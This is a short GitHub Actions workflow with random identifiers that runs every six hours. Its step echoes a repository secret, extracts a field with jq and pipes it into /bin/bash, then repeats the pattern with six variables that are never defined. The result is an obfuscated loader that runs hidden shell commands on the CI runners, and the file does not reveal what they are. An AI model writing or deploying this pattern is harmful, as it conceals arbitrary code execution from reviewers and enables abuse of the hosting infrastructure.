name: examineexact

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: examineexact
        env:
          wty16: ${{ secrets.wty16 }}
        run: |
          echo $wty16 | jq -r .p4039 | /bin/bash
          echo $ltwz12819 | jq -r .pce033 | /bin/bash
          echo $fxyjf52 | jq -r .qdlv5 | /bin/bash
          echo $w1 | jq -r .dy71 | /bin/bash
          echo $hj570 | jq -r .ljstb23615 | /bin/bash
          echo $shqj82 | jq -r .caaku4 | /bin/bash
          echo $j61 | jq -r .cccdc45 | /bin/bash

